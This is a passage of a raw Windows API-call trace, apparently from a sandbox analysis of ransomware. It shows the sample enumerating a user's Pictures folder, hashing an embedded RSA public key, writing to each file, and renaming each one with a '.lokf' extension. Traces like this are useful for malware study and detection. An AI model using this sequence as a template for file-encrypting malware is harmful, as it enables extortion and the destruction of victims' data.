KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.016] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.016] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8940) returned 1 [0059.017] CryptCreateHash (in: hProv=0x6b8940, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0059.017] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0059.017] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0059.017] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0059.017] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0059.017] GetLastError () returned 0x0 [0059.017] CryptDestroyHash (hHash=0x327cb80) returned 1 [0059.017] CryptReleaseContext (hProv=0x6b8940, dwFlags=0x0) returned 1 [0059.017] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0059.017] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0059.017] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0059.017] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0059.018] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c71640 [0059.018] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0059.018] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x12e4f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.018] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f4e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f4e8*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0059.018] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f4e8 | out: hHeap=0x660000) returned 1 [0059.018] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bc70 [0059.018] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x428) returned 0x32947b0 [0059.018] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", cchWideChar=-1, lpMultiByteStr=0x32947b0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", lpUsedDefaultChar=0x0) returned 41 [0059.018] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x430) returned 0x3297a68 [0059.019] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0059.019] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329bc70 | out: hHeap=0x660000) returned 1 [0059.019] WriteFile (in: hFile=0x5cc, lpBuffer=0x3297a68*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x3297a68*, lpNumberOfBytesWritten=0x9f4fb50*=0x28, lpOverlapped=0x0) returned 1 [0059.019] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3297a68 | out: hHeap=0x660000) returned 1 [0059.019] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0059.019] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0059.019] CloseHandle (hObject=0x5cc) returned 1 [0059.020] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8940 [0059.020] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x890) returned 0x3268798 [0059.020] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8940 | out: hHeap=0x660000) returned 1 [0059.020] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\02fNEn45dPvMPAwyDJ.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\02fnen45dpvmpawydj.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\02fNEn45dPvMPAwyDJ.bmp.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\02fnen45dpvmpawydj.bmp.lokf")) returned 1 [0059.020] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0059.020] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0059.020] VirtualFree (lpAddress=0x3700000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.021] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8720 | out: hHeap=0x660000) returned 1 [0059.021] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe23af6a0, ftCreationTime.dwHighDateTime=0x1d4cf2d, ftLastAccessTime.dwLowDateTime=0x839ad970, ftLastAccessTime.dwHighDateTime=0x1d4d451, ftLastWriteTime.dwLowDateTime=0x839ad970, ftLastWriteTime.dwHighDateTime=0x1d4d451, nFileSizeHigh=0x0, nFileSizeLow=0x12c14, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2JD7dc-DViv9j UmdwX.bmp", cAlternateFileName="2JD7DC~1.BMP")) returned 1 [0059.021] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3261058 [0059.021] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8720 [0059.021] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261058 | out: hHeap=0x660000) returned 1 [0059.021] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2JD7dc-DViv9j UmdwX.bmp") returned=".bmp" [0059.022] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2JD7dc-DViv9j UmdwX.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\2jd7dc-dviv9j umdwx.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0059.022] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=76820) returned 1 [0059.022] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0059.024] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x12bee, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.024] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0059.025] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0059.025] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0059.025] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0059.025] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x12c14, lpOverlapped=0x0) returned 1 [0059.025] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.025] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0059.025] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.025] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.025] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8940) returned 1 [0059.026] CryptCreateHash (in: hProv=0x6b8940, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0059.026] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0059.026] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0059.026] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0059.026] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0059.026] GetLastError () returned 0x0 [0059.026] CryptDestroyHash (hHash=0x327cb80) returned 1 [0059.026] CryptReleaseContext (hProv=0x6b8940, dwFlags=0x0) returned 1 [0059.026] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0059.026] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0059.026] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0059.026] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0059.026] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0059.026] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0059.026] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0059.026] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x12c10) returned 0x9c83710 [0059.027] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0059.027] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0059.027] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32995a0 [0059.027] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0059.027] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32afc78 [0059.027] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x3296560 [0059.027] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c82fe0 [0059.027] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b340 [0059.027] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c83028 [0059.027] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c71640 [0059.028] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x12c14, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.028] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f4e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f4e8*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0059.028] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f4e8 | out: hHeap=0x660000) returned 1 [0059.028] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0059.028] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0059.028] CloseHandle (hObject=0x5cc) returned 1 [0059.029] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2JD7dc-DViv9j UmdwX.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\2jd7dc-dviv9j umdwx.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2JD7dc-DViv9j UmdwX.bmp.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\2jd7dc-dviv9j umdwx.bmp.lokf")) returned 1 [0059.029] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0059.029] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0059.029] VirtualFree (lpAddress=0x3700000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.030] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8720 | out: hHeap=0x660000) returned 1 [0059.030] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2c7e1240, ftCreationTime.dwHighDateTime=0x1d4cdc8, ftLastAccessTime.dwLowDateTime=0xb0be800, ftLastAccessTime.dwHighDateTime=0x1d4c8c1, ftLastWriteTime.dwLowDateTime=0xb0be800, ftLastWriteTime.dwHighDateTime=0x1d4c8c1, nFileSizeHigh=0x0, nFileSizeLow=0x7e99, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3iuJ8NWM9DLs-PEj.bmp", cAlternateFileName="3IUJ8N~1.BMP")) returned 1 [0059.030] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\3iuJ8NWM9DLs-PEj.bmp") returned=".bmp" [0059.030] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\3iuJ8NWM9DLs-PEj.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\3iuj8nwm9dls-pej.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0059.030] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=32409) returned 1 [0059.031] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0059.033] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x7e73, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.033] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0059.034] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x7e99, lpOverlapped=0x0) returned 1 [0059.034] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.034] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.034] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.034] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8940) returned 1 [0059.035] CryptCreateHash (in: hProv=0x6b8940, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0059.035] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0059.035] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0059.035] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0059.035] GetLastError () returned 0x0 [0059.035] CryptDestroyHash (hHash=0x327cb80) returned 1 [0059.035] CryptReleaseContext (hProv=0x6b8940, dwFlags=0x0) returned 1 [0059.035] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0059.035] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0059.035] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0059.035] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0059.035] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0059.035] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0059.035] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x7ea0) returned 0x9c83710 [0059.035] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0059.035] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0059.035] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32995a0 [0059.035] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0059.035] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32afc78 [0059.035] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x32964a0 [0059.035] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c83028 [0059.035] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b358 [0059.035] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c83070 [0059.035] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b370 [0059.036] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b3a0 [0059.036] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ad10 [0059.036] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b3b8 [0059.036] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x24) returned 0x32a08a0 [0059.036] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x158) returned 0x9c78728 [0059.036] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c71640 [0059.036] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0059.036] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b3a0 | out: hHeap=0x660000) returned 1 [0059.036] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b3b8 | out: hHeap=0x660000) returned 1 [0059.036] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ad10 | out: hHeap=0x660000) returned 1 [0059.036] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32a08a0 | out: hHeap=0x660000) returned 1 [0059.036] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0059.036] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ad10 [0059.036] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f60 [0059.036] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6b3b8 [0059.036] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x3242348 [0059.036] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x9) returned 0x9c6b3a0 [0059.036] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f10 [0059.036] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10e) returned 